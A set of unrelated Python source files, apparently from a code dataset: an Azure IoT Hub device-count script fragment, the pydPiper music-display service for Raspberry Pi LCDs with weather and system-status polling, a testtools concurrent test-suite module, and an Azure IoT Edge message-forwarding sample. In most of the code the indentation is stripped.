iot_hub_manager = IoTHubRegistryManager(HUB_KEY)
# Get list of the devices in the hub
list_of_devices = iot_hub_manager.get_devices()
# Count the devices on the list
amount_of_devices = len(list_of_devices)
# Print it on the screen and return
print('Number of devices in the hub: ' + str( amount_of_devices ) )
return amount_of_devices
def decrement_online_devices(sig):
propeties.delete_instance()
print('Decrementing online devices')
time.sleep(1)
if __name__ == "__main__":
# Announcement
print('main.py - Running')
# Imports
from azure.iot.device import IoTHubDeviceClient, Message, MethodResponse
from azure.iot.hub import IoTHubRegistryManager
from azure.eventhub.aio import EventHubProducerClient
from azure.eventhub import EventData
from azure.iot.hub.models import Twin, TwinProperties, QuerySpecification, QueryResult
from azure.iot.device import IoTHubDeviceClient
import azure
import asyncio
import time
import threading
import propeties
import win32api
from connection_strings import HUB_KEY, DEVICE_KEYS, EVENT_HUB_KEY
import requests
win32api.SetConsoleCtrlHandler(decrement_online_devices, True)
main()
else:
print('main.py - Imported externally. Weird...')
|
pydPiper.py
|
#!/usr/bin/python.pydPiper
# coding: UTF-8
# pydPiper service to display music data to LCD and OLED character displays
# Written by: Ron Ritchey
from __future__ import unicode_literals
import json, threading, logging, Queue, time, sys, getopt, moment, signal, commands, os, copy, datetime, math, requests
import pages
import displays
import sources
import pydPiper_config
import pause
#try:
# import pyowm
#except ImportError:
# pass
exitapp = [ False ]
class music_controller(threading.Thread):
# Receives updates from music services
# Determines what page to displays
# Sends relevant updates to display_controller
# musicdata variables.
# Includes all from musicdata class plus environmentals
musicdata_init = {
'state':u"stop",
'musicdatasource':u"",
'actPlayer':u"",
'artist':u"",
'title':u"",
'album':u"",
'uri':u"",
'current':-1,
'elapsed':-1,
'remaining':u"",
'duration':-1,
'length':-1,
'position':u"",
'elapsed_formatted':u"",
'volume':-1,
'repeat': 0,
'single': 0,
'random': 0,
'channels':0,
'bitdepth':u"",
'bitrate':u"",
'samplerate':u"",
'type':u"",
'tracktype':u"",
'repeat_onoff': u"Off",
'single_onoff': u"Off",
'random_onoff': u"Off",
'playlist_display':u"",
'playlist_position':-1,
'playlist_count':-1,
'playlist_length':-1,
'current_tempc':0,
'current_tempf':0,
'disk_avail':0,
'disk_availp':0,
'current_time':u"",
'utc':moment.utcnow(),
'localtime':moment.utcnow().timezone(pydPiper_config.TIMEZONE),
'current_time_sec':u"",
'current_time_formatted':u"",
'time_formatted':u"",
'current_ip':u"",
'outside_conditions':'No data',
'outside_temp_min':0,
'outside_temp_max':0,
'outside_temp_formatted':'',
'system_temp_formatted':''
}
def __init__(self, servicelist, display_controller, showupdates=False):
threading.Thread.__init__(self)
self.daemon = True
self.musicqueue = Queue.Queue()
self.image = None
self.showupdates = showupdates
self.display_controller = display_controller
self.musicdata = copy.deepcopy(self.musicdata_init)
self.musicdata_prev = copy.deepcopy(self.musicdata)
self.servicelist = servicelist
self.services = { }
# Attempt to initialize services
self.initservices()
# Lock used to prevent simultaneous update of the musicdata dictionary
self.musicdata_lock = threading.Lock()
def initservices(self):
# Make sure that if rune is selected it is the only service that is selected
if u"rune" in self.servicelist and len(self.servicelist) > 1:
logging.critical(u"Rune service can only be used alone")
raise RuntimeError(u"Rune service can only be used alone")
if u"volumio" in self.servicelist and len(self.servicelist) > 1:
logging.critical(u"Volumio service can only be used alone")
raise RuntimeError(u"Volumio service can only be used alone")
musicservice = None
for s in self.servicelist:
s = s.lower()
try:
if s == u"mpd" or s == u"moode":
musicservice = sources.musicdata_mpd.musicdata_mpd(self.musicqueue, pydPiper_config.MPD_SERVER, pydPiper_config.MPD_PORT, pydPiper_config.MPD_PASSWORD)
elif s == u"spop":
musicservice = sources.musicdata_spop.musicdata_spop(self.musicqueue, pydPiper_config.SPOP_SERVER, pydPiper_config.SPOP_PORT, pydPiper_config.SPOP_PASSWORD)
elif s == u"lms":
musicservice = sources.musicdata_lms.musicdata_lms(self.musicqueue, pydPiper_config.LMS_SERVER, pydPiper_config.LMS_PORT, pydPiper_config.LMS_USER, pydPiper_config.LMS_PASSWORD, pydPiper_config.LMS_PLAYER)
elif s == u"rune":
musicservice = sources.musicdata_rune.musicdata_rune(self.musicqueue, pydPiper_config.RUNE_SERVER, pydPiper_config.RUNE_PORT, pydPiper_config.RUNE_PASSWORD)
elif s == u"volumio":
musicservice = sources.musicdata_volumio2.musicdata_volumio2(self.musicqueue, pydPiper_config.VOLUMIO_SERVER, pydPiper_config.VOLUMIO_PORT, exitapp )
else:
logging.debug(u"Unsupported music service {0} requested".format(s))
continue
except NameError:
# Missing dependency for requested servicelist
logging.warning(u"Request for {0} failed due to missing dependencies".format(s))
pass
if musicservice != None:
self.services[s] = musicservice
if len(self.services) == 0:
logging.critical(u"No music services succeeded in initializing")
raise RuntimeError(u"No music services succeeded in initializing")
def launch_update_thread(self, func):
sv_t = threading.Thread(target=func)
sv_t.daemon = True
sv_t.start()
def run(self):
logging.debug(u"Music Controller Starting")
self.launch_update_thread(self.updatesystemvars)
self.launch_update_thread(self.updateconditions)
self.launch_update_thread(self.updateforecast)
timesongstarted = 0
# Inform the system that we are starting up
with self.musicdata_lock:
self.musicdata_prev[u'state'] = ''
self.musicdata[u'state'] = 'starting'
self.starttime = time.time()
lastupdate = 0 # Initialize variable to be used to force updates every second regardless of the receipt of a source update
while not exitapp[0]:
updates = { }
# Check if we are starting up. If yes, update pages to display any start message.
if self.starttime + pydPiper_config.STARTUP_MSG_DURATION > time.time():
time.sleep(pydPiper_config.STARTUP_MSG_DURATION)
with self.musicdata_lock:
self.musicdata['state'] = 'stop'
continue
# Attempt to get an update from the queue
try:
updates = self.musicqueue.get_nowait()
self.musicqueue.task_done()
except Queue.Empty:
pass
# Get current time
try:
utc = moment.utcnow()
localtime = moment.utcnow().timezone(pydPiper_config.TIMEZONE)
current_time_ampm = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime(u"%p").strip().decode()
if pydPiper_config.TIME24HOUR == True:
current_time = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime(u"%H:%M").strip().decode()
current_time_sec = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime(u"%H:%M:%S").strip().decode()
else:
current_time = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime(u"%-I:%M %p").strip().decode()
current_time_sec = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime(u"%-I:%M:%S %p").strip().decode()
except ValueError:
# Don't know why but on exit, the moment code is occasionally throwing a ValueError
current_time = u"00:00"
current_time_sec = u"00:00:00"
current_time_ampm = u''
utc = None
localtime = None
with self.musicdata_lock:
# Update musicdata based upon received message
for item, value in updates.iteritems():
self.musicdata[item] = value
# Update song timing variables
if u'elapsed' in updates:
self.musicdata[u'elapsed'] = self.musicdata[u'current'] = updates[u'elapsed']
timesongstarted = time.time() - self.musicdata[u'elapsed']
if self.musicdata[u'state'] == u'play':
if u'elapsed' not in updates:
if timesongstarted > 0:
self.musicdata[u'elapsed'] = int(time.time() - timesongstarted)
else:
# We got here without timesongstarted being set which is a problem...
logging.debug(u"Trying to update current song position with an uninitialized start time")
# If the value of current has changed then update the other related timing variables
if self.musicdata[u'elapsed'] != self.musicdata_prev[u'elapsed']:
if self.musicdata[u'length'] > 0:
timepos = time.strftime("%-M:%S", time.gmtime(self.musicdata[u'elapsed'])) + "/" + time.strftime("%-M:%S", time.gmtime(self.musicdata[u'length']))
remaining = time.strftime("%-M:%S", time.gmtime(self.musicdata[u'length'] - self.musicdata[u'elapsed'] ) )
else:
timepos = time.strftime("%-M:%S", time.gmtime(self.musicdata[u'elapsed']))
remaining = timepos
self.musicdata[u'remaining'] = remaining.decode()
self.musicdata[u'elapsed_formatted'] = self.musicdata[u'position'] = timepos.decode()
# Update onoff variables (random, single, repeat)
self.musicdata[u'random_onoff'] = u"On" if self.musicdata[u'random'] else u"Off"
self.musicdata[u'single_onoff'] = u"On" if self.musicdata[u'single'] else u"Off"
self.musicdata[u'repeat_onoff'] = u"On" if self.musicdata[u'repeat'] else u"Off"
# update time variables
self.musicdata[u'utc'] = utc
self.musicdata[u'localtime'] = localtime
self.musicdata[u'time'] = current_time
self.musicdata[u'time_ampm'] = current_time_ampm
# note: 'time_formatted' is computed during page processing as it needs the value of the strftime key contained on the line being displayed
# For backwards compatibility
self.musicdata[u'current_time'] = current_time
self.musicdata[u'current_time_sec'] = current_time
# If anything has changed, update pages ### probably unnecessary to check this now that time is being updated in this section
if self.musicdata != self.musicdata_prev or lastupdate < time.time():
# Set lastupdate time to 1 second in the future
lastupdate = time.time()+1
self.musicdata[u'time_formatted'] = moment.utcnow().timezone(pydPiper_config.TIMEZONE).strftime('%H:%M').strip().decode()
# To support previous key used for this purpose
self.musicdata[u'current_time_formatted'] = self.musicdata[u'time_formatted']
# Update display controller
# The primary call to this routine is in main but this call is needed to catch variable changes before musicdata_prev is updated.
self.display_controller.next()
# Print the current contents of musicdata if showupdates is True
if self.showupdates:
# Check to see if a variable has changed (except time variables)
shouldshowupdate = False
for item, value in self.musicdata.iteritems():
try:
if item in ['utc', 'localtime', 'time', 'time_ampm', 'current_time', 'current_time_sec']:
continue
if self.musicdata_prev[item] != value:
shouldshowupdate = True
break
except KeyError:
shouldshowupdate = True
break
if shouldshowupdate:
ctime = localtime.strftime("%-I:%M:%S %p").strip()
print u"Status at time {0}".format(ctime)
with self.musicdata_lock:
for item,value in self.musicdata.iteritems():
try:
print u" [{0}]={1} {2}".format(item,repr(value), type(value))
except:
print u"err"
print u"[{0}] =".format(item)
print type(value)
print repr(value)
print u"\n"
# Update musicdata_prev
with self.musicdata_lock:
for item, value in self.musicdata.iteritems():
try:
if self.musicdata_prev[item] != value:
self.musicdata_prev[item] = value
except KeyError:
self.musicdata_prev[item] = value
# Update display data every 1/4 second
time.sleep(.25)
def checkweatherconfiguration(self):
if not pydPiper_config.WEATHER_SERVICE:
logging.debug('Weather service not enabled')
return False
if pydPiper_config.WEATHER_SERVICE not in ['wunderground', 'accuweather']:
logging.warning('{0} is not a valid weather service'.format(pydPiper_config.WEATHER_SERVICE))
return False
if not pydPiper_config.WEATHER_API:
logging.warning('Weather service requires an API key. Weather services will not be available until one is provided')
return False
if not pydPiper_config.WEATHER_LOCATION:
logging.warning('Weather service requires that a location be specified. Weather services will not be available until one is provided')
return False
return True
def checkaccuweatherreturn(self, status_code, querystr=u''):
if status_code == 400:
logging.warning('Request had bad syntax or the parameters supplied were invalid. Request was [{0}]'.format(querystr))
elif status_code == 401:
logging.warning('Unauthorized. API authorization failed. API key is [{0}]'.format(pydPiper_config.WEATHER_API))
elif status_code == 403:
logging.warning('Unauthorized. You do not have permission to access this endpoint')
elif status_code == 404:
logging.warning('Server has not found a route matching the given URI. Request was [{0}]'.format(querystr))
elif status_code == 500:
logging.warning('Server encountered an unexpected condition which prevented it from fulfilling the request. Request was [{0}]'.format(querystr))
elif status_code == 200:
return True
else:
logging.warning('An unexpected return value was provided. Value was [{0}]. Request was [{1}]'.format(status_code,querystr))
return False
def updateforecast(self):
if not self.checkweatherconfiguration():
return
logging.debug('Initializing weather forecast update process. Forecasts will update every 12 hours at noon and midnight')
while not exitapp[0]:
updateFlag = False
logging.debug('Requesting weather forecast from {0}'.format(pydPiper_config.WEATHER_SERVICE))
if pydPiper_config.WEATHER_SERVICE == 'accuweather':
querystr = 'http://dataservice.accuweather.com/forecasts/v1/daily/1day/' + pydPiper_config.WEATHER_LOCATION
r = requests.get(querystr, { 'apikey': pydPiper_config.WEATHER_API, })
if self.checkaccuweatherreturn(r.status_code, querystr):
try:
res = r.json()
todaysForecast = res['DailyForecasts'][0]
temp_max_f = todaysForecast['Temperature']['Maximum']['Value'] if todaysForecast['Temperature']['Maximum']['Unit'] == 'F' else round((todaysForecast['Temperature']['Maximum']['Value']*1.8)+32,1)
temp_min_f = todaysForecast['Temperature']['Minimum']['Value'] if todaysForecast['Temperature']['Minimum']['Unit'] == 'F' else round((todaysForecast['Temperature']['Minimum']['Value']*1.8)+32,1)
outside_temp_max = temp_max_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else round((temp_max_f-32)*0.55555556,1)
outside_temp_min = temp_min_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else round((temp_min_f-32)*0.55555556,1)
outside_temp_max_formatted = u"{0}°{1}".format(int(outside_temp_max),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_temp_min_formatted = u"{0}°{1}".format(int(outside_temp_min),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_conditions = todaysForecast['Day']['IconPhrase']
updateFlag = True
except (KeyError, IndexError, ValueError):
logging.warning('AccuWeather provided a response in an unexpected format. Received [{0}]'.format(res))
if updateFlag:
logging.debug('Forecast calls for a high of {0}, a low of {1}. Condition is {2}'.format(outside_temp_max_formatted, outside_temp_min_formatted, outside_conditions))
with self.musicdata_lock:
self.musicdata[u'outside_temp_max'] = outside_temp_max
self.musicdata[u'outside_temp_min'] = outside_temp_min
self.musicdata[u'outside_temp_max_formatted'] = outside_temp_max_formatted
self.musicdata[u'outside_temp_min_formatted'] = outside_temp_min_formatted
self.musicdata[u'outside_conditions'] = outside_conditions
# Sleep until next update which occurs every half day
pause.sleepUntil(time.time()+pause.nextHalfday(60), exitapp)
def updateconditions(self):
if not self.checkweatherconfiguration():
return
logging.debug('Initializing weather current conditions update process. Current conditions will update every hour')
while not exitapp[0]:
updateFlag = False
# If using accuweather, sample current condition date every hour
if pydPiper_config.WEATHER_SERVICE == 'accuweather':
logging.debug('Requesting current conditions from {0}'.format(pydPiper_config.WEATHER_SERVICE))
querystr = 'http://dataservice.accuweather.com/currentconditions/v1/' + pydPiper_config.WEATHER_LOCATION
r = requests.get(querystr, { 'apikey': pydPiper_config.WEATHER_API })
if self.checkaccuweatherreturn(r.status_code, querystr):
try:
res = r.json()
current_observation = res[0]
temp = current_observation['Temperature']['Imperial']['Value'] if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else current_observation['Temperature']['Metric']['Value']
temp_formatted = u"{0}°{1}".format(int(temp),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
updateFlag = True
except (KeyError, IndexError, ValueError):
logging.warning('AccuWeather provided a response in an unexpected format. Received [{0}]'.format(res))
if updateFlag:
logging.debug('Current Temperature is {0}'.format(temp_formatted))
with self.musicdata_lock:
self.musicdata[u'outside_temp'] = temp
self.musicdata[u'outside_temp_formatted'] = temp_formatted
# If using Weather Underground, sample current and forecast condition data every hour
elif pydPiper_config.WEATHER_SERVICE == 'wunderground':
querystr = 'http://api.wunderground.com/api/' + pydPiper_config.WEATHER_API + '/geolookup/conditions/forecast/q/' + pydPiper_config.WEATHER_LOCATION + '.json'
r = requests.get(querystr)
if self.checkaccuweatherreturn(r.status_code, querystr):
try:
res = r.json()
if 'error' in res['response']:
logging.warning('Error occurred retrieving forecast from Weather Underground. Problem type was [{0}]:[{1}]'.format(res['response']['error']['type'],res['response']['error']['description']))
else:
todaysForecast = res['forecast']['simpleforecast']['forecastday'][0]
currentObservation = res['current_observation']
temp = currentObservation['temp_f'] if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else currentObservation['temp_c']
temp_formatted = u"{0}°{1}".format(int(temp),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
temp_max_f = round(float(todaysForecast['high']['fahrenheit']),1)
temp_min_f = round(float(todaysForecast['low']['fahrenheit']),1)
temp_max_c = round(float(todaysForecast['high']['celsius']),1)
temp_min_c = round(float(todaysForecast['low']['celsius']),1)
outside_temp_max = temp_max_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else temp_max_c
outside_temp_min = temp_min_f if pydPiper_config.TEMPERATURE.lower() == 'fahrenheit' else temp_min_c
outside_temp_max_formatted = u"{0}°{1}".format(int(outside_temp_max),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_temp_min_formatted = u"{0}°{1}".format(int(outside_temp_min),{'fahrenheit':'F', 'celsius': 'C'}.get(pydPiper_config.TEMPERATURE.lower()))
outside_conditions = currentObservation['weather']
updateFlag = True
except (KeyError, IndexError, ValueError):
logging.warning('Weather Underground provided a response in an unexpected format. Received [{0}]'.format(res))
if updateFlag:
logging.debug('Current Temperature is {0}'.format(temp_formatted))
with self.musicdata_lock:
self.musicdata[u'outside_temp'] = temp
self.musicdata[u'outside_temp_formatted'] = temp_formatted
self.musicdata[u'outside_temp_max'] = outside_temp_max
self.musicdata[u'outside_temp_min'] = outside_temp_min
self.musicdata[u'outside_temp_max_formatted'] = outside_temp_max_formatted
self.musicdata[u'outside_temp_min_formatted'] = outside_temp_min_formatted
self.musicdata[u'outside_conditions'] = outside_conditions
# Sleep until next update which occurs every hour
pause.sleepUntil(time.time()+pause.nextHour(60), exitapp)
def updatesystemvars(self):
logging.debug('Initializing current system status update process. System status will update every five minutes')
while not exitapp[0]:
current_ip = commands.getoutput(u"ip -4 route get 1 | head -1 | cut -d' ' -f8 | tr -d '\n'").strip()
try:
with open(u"/sys/class/thermal/thermal_zone0/temp") as file:
system_tempc = int(file.read())
# Convert value to float and correct decimal place
system_tempc = round(float(system_tempc) / 1000,1)
# convert to fahrenheit
system_tempf = round(system_tempc*9/5+32,1)
except AttributeError:
system_tempc = 0.0
system_tempf = 0.0
try:
if pydPiper_config.TEMPERATURE.lower() == u'celsius':
system_temp = system_tempc
system_temp_formatted = u"{0}°c".format(int(system_temp))
else:
system_temp = system_tempf
system_temp_formatted = u"{0}°f".format(int(system_temp))
except:
system_temp = system_tempf
system_temp_formatted = u"{0}°f".format(int(system_temp))
try:
# Check if running on OSX. If yes, adjust df command
if sys.platform == u"darwin":
with os.popen(u"df /") as p:
p = os.popen(u"df /")
line = p.readline()
line = p.readline()
va = line.split()
line = "{0} {1}".format(va[3], va[4])
else:
# assume running on Raspberry linux
with os.popen(u"df -B 1 /") as p:
line = p.readline()
line = p.readline().strip()
va = line.split()
avail = int(va[3])
usedp = int(va[4][:-1]) # Remove trailing % and convert to int
used = int(va[2])
availp = 100-usedp
except AttributeError:
avail = 0
availp = 0
usedp = 0
used = 0
logging.debug('System status: Temp {0}, Disk space remaining {1}%, IP address {2}'.format(system_temp_formatted, availp, current_ip.decode()))
with self.musicdata_lock:
self.musicdata[u'system_temp'] = system_temp
self.musicdata[u'system_temp_formatted'] = system_temp_formatted
self.musicdata[u'system_tempc'] = system_tempc
self.musicdata[u'system_tempf'] = system_tempf
# For backward compatibility
self.musicdata[u'current_tempc'] = self.musicdata[u'system_tempc']
self.musicdata[u'current_tempf'] = self.musicdata[u'system_tempf']
self.musicdata[u'disk_avail'] = avail
self.musicdata[u'disk_availp'] = availp
self.musicdata[u'disk_used'] = used
self.musicdata[u'disk_usedp'] = usedp
self.musicdata[u'ip'] = current_ip.decode()
# For backwards compatibility
self.musicdata[u'current_ip'] = current_ip.decode()
# Sleep until next update which occurs every five minutes
pause.sleepUntil(time.time()+300, exitapp)
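# Stand-alone sketch (illustrative only) of the elapsed-time technique used in
# music_controller.run() above: derive the song start time from the last
# reported 'elapsed' value, then estimate the current position from wall-clock
# time until the next update arrives from the music service.
def _estimate_elapsed_sketch(reported_elapsed, reported_at, now):
    timesongstarted = reported_at - reported_elapsed
    return int(now - timesongstarted)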
def sigterm_handler(_signo, _stack_frame):
sys.exit(0)
if __name__ == u'__main__':
import math
signal.signal(signal.SIGTERM, sigterm_handler)
# Changing the system encoding should no longer be needed
# if sys.stdout.encoding != u'UTF-8':
# sys.stdout = codecs.getwriter(u'utf-8')(sys.stdout, u'strict')
logging.basicConfig(format=u'%(asctime)s:%(levelname)s:%(message)s', filename=pydPiper_config.LOGFILE, level=pydPiper_config.LOGLEVEL)
logging.getLogger().addHandler(logging.StreamHandler())
logging.getLogger(u'socketIO-client').setLevel(logging.WARNING)
# Move unhandled exception messages to log file
def handleuncaughtexceptions(exc_type, exc_value, exc_traceback):
if issubclass(exc_type, KeyboardInterrupt):
sys.__excepthook__(exc_type, exc_value, exc_traceback)
return
logging.error(u"Uncaught exception", exc_info=(exc_type, exc_value, exc_traceback))
try:
if len(mc.musicdata) > 0:
logging.error(u"Player status at exception")
logging.error(unicode(mc.musicdata))
except NameError:
# If this gets called before the music controller is instantiated, ignore it
pass
sys.__excepthook__(exc_type, exc_value, exc_traceback)
sys.excepthook = handleuncaughtexceptions
# Suppress MPD libraries INFO messages
loggingMPD = logging.getLogger(u"mpd")
loggingMPD.setLevel( logging.WARN )
loggingPIL = logging.getLogger(u'PIL')
loggingPIL.setLevel( logging.WARN )
try:
opts, args = getopt.getopt(sys.argv[1:],u"d:",[u"driver=",u"devicetype=",u"width=",u"height=","rs=","e=","d4=","d5=","d6=","d7=","i2caddress=","i2cport=" ,u"wapi=", u"wlocale=", u"timezone=", u"temperature=", u"lms",u"mpd",u"spop",u"rune",u"volumio",u"pages=", u"lmsplayer=", u"showupdates"])
except getopt.GetoptError:
print u'pydPiper.py -d <driver> --devicetype <devicetype (for LUMA devices)> --width <width in pixels> --height <height in pixels> --rs <rs> --e <e> --d4 <d4> --d5 <d5> --d6 <d6> --d7 <d7> --i2caddress <i2c address> --i2cport <i2c port> --wapi <weather underground api key> --wlocale <weather location> --timezone <timezone> --temperature <fahrenheit or celsius> --mpd --spop --lms --rune --volumio --pages <pagefile> --lmsplayer <mac address of lms player> --showupdates'
sys.exit(2)
services_list = [ ]
driver = ''
devicetype = ''
showupdates = False
pagefile = 'pages.py'
pin_rs = pydPiper_config.DISPLAY_PIN_RS
pin_e = pydPiper_config.DISPLAY_PIN_E
[pin_d4, pin_d5, pin_d6, pin_d7] = pydPiper_config.DISPLAY_PINS_DATA
rows = pydPiper_config.DISPLAY_HEIGHT
cols = pydPiper_config.DISPLAY_WIDTH
i2c_address = pydPiper_config.DISPLAY_I2C_ADDRESS
i2c_port = pydPiper_config.DISPLAY_I2C_PORT
enable = pydPiper_config.DISPLAY_ENABLE_DURATION
driver = pydPiper_config.DISPLAY_DRIVER
pagefile = pydPiper_config.PAGEFILE
services_list.append(pydPiper_config.MUSIC_SERVICE)
for opt, arg in opts:
if opt == u'-h':
print u'pydPiper.py -d <driver> --devicetype <devicetype e.g. ssd1306, sh1106> --width <width in pixels> --height <height in pixels> --rs <rs> --e <e> --d4 <d4> --d5 <d5> --d6 <d6> --d7 <d7> --i2caddress <i2c address> --i2cport <i2c port> --enable <enable duration> --wapi <weather underground api key> --wlocale <weather location> --timezone <timezone> --temperature <fahrenheit or celsius> --mpd --spop --lms --rune --volumio --pages <pagefile> --lmsplayer <mac address of lms player> --showupdates'
sys.exit()
elif opt in (u"-d", u"--driver"):
driver = arg
elif opt in (u"--devicetype"):
devicetype = arg
elif opt in ("--rs"):
pin_rs = int(arg)
elif opt in ("--e"):
pin_e = int(arg)
elif opt in ("--d4"):
pin_d4 = int(arg)
elif opt in ("--d5"):
pin_d5 = int(arg)
elif opt in ("--d6"):
pin_d6 = int(arg)
elif opt in ("--d7"):
pin_d7 = int(arg)
elif opt in ("--i2caddress"):
i2c_address = int(arg,0)
elif opt in ("--i2cport"):
i2c_port = int(arg,0)
elif opt in ("--width"):
cols = int(arg,0)
elif opt in ("--height"):
rows = int(arg,0)
elif opt in ("--enable"):
enable = int(arg)
elif opt in (u"--wapi"):
pydPiper_config.WUNDER_API = arg
elif opt in (u"--wlocale"):
pydPiper_config.WUNDER_LOCATION = arg
elif opt in (u"--timezone"):
pydPiper_config.TIMEZONE = arg
elif opt in (u"--temperature"):
pydPiper_config.TEMPERATURE = arg
elif opt in (u"--mpd"):
services_list.append(u'mpd')
elif opt in (u"--spop"):
services_list.append(u'spop')
elif opt in (u"--lms"):
services_list.append(u'lms')
elif opt in (u"--lmsplayer"):
pydPiper_config.LMS_PLAYER = arg
elif opt in (u"--rune"):
services_list.append(u'rune')
elif opt in (u"--volumio"):
services_list.append(u'volumio')
elif opt in (u"--pages"):
pagefile = arg
# print u"Loading {0} as page file".format(arg)
# If page file provided, try to load provided file on top of default pages file
# try:
# newpages = imp.load_source(u'pages', arg)
# if validpages(newpages):
# pages = newpages
# else:
# print u"Invalid page file provided. Using default pages."
# except IOError:
# # Page file not found
# print u"Page file {0} not found. Using default pages".format(arg)
elif opt in (u"--showupdates"):
showupdates = True
pydPiper_config.DISPLAY_SIZE = (cols, rows)
pins_data = [pin_d4, pin_d5, pin_d6, pin_d7]
if len(services_list) == 0:
logging.critical(u"Must have at least one music service to monitor")
sys.exit()
logging.info(u'pydPiper starting')
dq = Queue.Queue()
# Choose display
if not driver:
try:
driver = pydPiper_config.DISPLAY_DRIVER
except:
driver = u''
if not devicetype:
try:
devicetype = pydPiper_config.DISPLAY_DEVICETYPE
except:
devicetype = u''
if driver == u"winstar_weg":
lcd = displays.winstar_weg.winstar_weg(rows, cols, pin_rs, pin_e, pins_data, enable)
elif driver == u"hd44780":
lcd = displays.hd44780.hd44780(rows, cols, pin_rs, pin_e, pins_data, enable)
elif driver == u"hd44780_i2c":
lcd = displays.hd44780_i2c.hd44780_i2c(rows, cols, i2c_address, i2c_port, enable)
elif driver == u"ssd1306_i2c":
lcd = displays.ssd1306_i2c.ssd1306_i2c(rows, cols, i2c_address, i2c_port)
elif driver == u"luma_i2c":
lcd = displays.luma_i2c.luma_i2c(rows, cols, i2c_address, i2c_port, devicetype)
elif driver == u"curses":
lcd = displays.curses.curses(rows, cols)
else:
logging.critical(u"No valid display found")
sys.exit()
lcd.clear()
logging.debug('Loading display controller')
dc = displays.display.display_controller(pydPiper_config.DISPLAY_SIZE)
logging.debug('Loading music controller')
mc = music_controller(services_list, dc, showupdates)
time.sleep(2)
mc.start()
dc.load(pagefile, mc.musicdata,mc.musicdata_prev )
try:
while True:
# Get next image and send it to the display every .1 seconds
with mc.musicdata_lock:
img = dc.next()
# displays.graphics.update(img)
lcd.update(img)
time.sleep(pydPiper_config.ANIMATION_SMOOTHING)
except KeyboardInterrupt:
pass
finally:
print u"Shutting down threads"
exitapp[0] = True
try:
lcd.clear()
lcd.message(u"Exiting...")
time.sleep(3)
lcd.clear()
lcd.cleanup()
except:
pass
mc.join()
logging.info(u"Exiting...")
|
testsuite.py
|
# Copyright (c) 2009 Jonathan M. Lange. See LICENSE for details.
"""Test suites and related things."""
__metaclass__ = type
__all__ = [
'ConcurrentTestSuite',
'iterate_tests',
]
try:
from Queue import Queue
except ImportError:
from queue import Queue
import threading
import unittest
import testtools
def iterate_tests(test_suite_or_case):
"""Iterate through all of the test cases in 'test_suite_or_case'."""
try:
suite = iter(test_suite_or_case)
except TypeError:
yield test_suite_or_case
else:
for test in suite:
for subtest in iterate_tests(test):
yield subtest
class ConcurrentTestSuite(unittest.TestSuite):
"""A TestSuite whose run() calls out to a concurrency strategy."""
def __init__(self, suite, make_tests):
"""Create a ConcurrentTestSuite to execute suite.
:param suite: A suite to run concurrently.
:param make_tests: A helper function to split the tests in the
ConcurrentTestSuite into some number of concurrently executing
sub-suites. make_tests must take a suite, and return an iterable
of TestCase-like objects, each of which must have a run(result)
method.
"""
super(ConcurrentTestSuite, self).__init__([suite])
self.make_tests = make_tests
def run(self, result):
"""Run the tests concurrently.
This calls out to the provided make_tests helper, and then serialises
the results so that result only sees activity from one TestCase at
a time.
ConcurrentTestSuite provides no special mechanism to stop the tests
returned by make_tests; it is up to those tests to honour the
shouldStop attribute on the result object they are run with, which will
be set if an exception is raised in the thread in which
ConcurrentTestSuite.run is called.
"""
tests = self.make_tests(self)
try:
threads = {}
queue = Queue()
result_semaphore = threading.Semaphore(1)
for test in tests:
process_result = testtools.ThreadsafeForwardingResult(result,
result_semaphore)
reader_thread = threading.Thread(
target=self._run_test, args=(test, process_result, queue))
threads[test] = reader_thread, process_result
reader_thread.start()
while threads:
finished_test = queue.get()
threads[finished_test][0].join()
del threads[finished_test]
except:
for thread, process_result in threads.values():
process_result.stop()
raise
def _run_test(self, test, process_result, queue):
try:
test.run(process_result)
finally:
queue.put(test)
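# Sketch of a make_tests helper (illustrative only) matching the contract that
# ConcurrentTestSuite.__init__ documents above: take the wrapping suite and
# return an iterable of independently runnable sub-suites, here one suite per
# test case so every test runs on its own thread.
def split_suite_per_test(suite):
    return [unittest.TestSuite([case]) for case in iterate_tests(suite)]
# e.g. ConcurrentTestSuite(original_suite, split_suite_per_test).run(result)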
|
main.py
|
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE file in the project root for
# full license information.
# For guidance, see https://docs.microsoft.com/azure/iot-edge/tutorial-python-module
import sys
import time
import threading
from azure.iot.device import IoTHubModuleClient, Message
# global counters
RECEIVED_MESSAGES = 0
def receive_message_listener(client):
# This listener function only triggers for messages sent to "input1".
# Messages sent to other inputs or to the default will be silently discarded.
global RECEIVED_MESSAGES
while True:
message = client.receive_message_on_input("input1") # blocking call
RECEIVED_MESSAGES += 1
print("Message received on input1")
print( " Data: <<{}>>".format(message.data) )
print( " Properties: {}".format(message.custom_properties))
print( " Total calls received: {}".format(RECEIVED_MESSAGES))
print("Forwarding message to output1")
client.send_message_to_output(message, "output1")
print("Message successfully forwarded")
def main():
try:
print ( "\nPython {}\n".format(sys.version) )
print ( "IoT Hub Client for Python" )
client = IoTHubModuleClient.create_from_edge_environment()
# Begin listening for messages
message_listener_thread = threading.Thread(target=receive_message_listener, args=(client,))
message_listener_thread.daemon = True
message_listener_thread.start()
print ( "Starting the IoT Hub Python sample...")
print ( "The sample is now waiting for messages and will indefinitely. Press Ctrl-C to exit. ")
while True:
time.sleep(1000)
except KeyboardInterrupt:
print ( "IoTHubClient sample stopped" )
except:
print ( "Unexpected error from IoTHub" )
return
if __name__ == '__main__':
try:
main()
except Exception as error:
print ( error )
sys.exit(1)
|
